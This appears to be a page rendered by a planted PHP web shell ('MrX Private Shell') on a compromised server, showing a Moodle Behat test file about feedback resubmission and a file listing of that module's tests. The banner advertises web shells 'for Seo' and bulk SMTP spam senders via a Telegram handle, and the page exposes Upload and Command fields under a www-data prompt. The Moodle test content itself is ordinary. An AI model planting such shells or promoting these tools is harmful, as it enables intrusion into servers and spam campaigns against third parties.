__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.10: ~ $
@mod @mod_feedback
Feature: Non anonymous feedback with multiple submissions
  In order to modify feedback response
  As a student
  I need to be able to see previous response when I re-submit feedback

  Background:
    Given the following "users" exist:
      | username | firstname | lastname |
      | user1    | Username  | 1        |
      | user2    | Username  | 2        |
      | teacher  | Teacher   | 3        |
      | manager  | Manager   | 4        |
    And the following "courses" exist:
      | fullname | shortname |
      | Course 1 | C1        |
    And the following "course enrolments" exist:
      | user  | course | role    |
      | user1 | C1     | student |
      | user2 | C1     | student |
      | teacher | C1   | editingteacher |
    And the following "activities" exist:
      | activity   | name            | course | idnumber  | anonymous | publish_stats | multiple_submit | section |
      | feedback   | Course feedback | C1     | feedback1 | 2         | 1             | 1               | 0       |

  Scenario: Completing a feedback second time
    When I log in as "teacher"
    And I am on "Course 1" course homepage
    And I follow "Course feedback"
    And I navigate to "Questions" in current page administration
    And I add a "Short text answer" question to the feedback with:
      | Question                    | first      |
      | Label                       | shorttext1 |
      | Maximum characters accepted | 200        |
    And I add a page break to the feedback
    And I add a "Short text answer" question to the feedback with:
      | Question                    | second     |
      | Label                       | shorttext2 |
      | Maximum characters accepted | 200        |
    And I log out
    And I log in as "user1"
    And I am on "Course 1" course homepage
    And I follow "Course feedback"
    And I follow "Answer the questions"
    And I set the following fields to these values:
      | first | 111 |
    And I press "Next"
    And I set the following fields to these values:
      | second | 222 |
    And I press "Submit your answers"
    And I log out
    And I log in as "user1"
    And I am on "Course 1" course homepage
    And I follow "Course feedback"
    And I follow "Answer the questions"
    Then the field "first" matches value "111"
    And I press "Next"
    And the field "second" matches value "222"
    And I set the following fields to these values:
      | second | 333 |
    And I press "Submit your answers"

Filemanager

Name Type Size Permission Actions
anonymous.feature File 11.23 KB 0777
behat_mod_feedback.php File 10.35 KB 0777
coursemapping.feature File 11.22 KB 0777
export_import.feature File 6.37 KB 0777
feedback_activity_completion.feature File 3.49 KB 0777
feedback_no_calendar_capabilities.feature File 2.04 KB 0777
groups.feature File 14.58 KB 0777
multichoice.feature File 21.46 KB 0777
multipleattempt.feature File 2.45 KB 0777
non_anonymous.feature File 7.22 KB 0777
preview_questions.feature File 2.17 KB 0777
question_types.feature File 6.89 KB 0777
question_types_non_anon.feature File 7.21 KB 0777
questions.feature File 4.61 KB 0777
show_nonrespondents.feature File 2.71 KB 0777
templates.feature File 9.97 KB 0777
Filemanager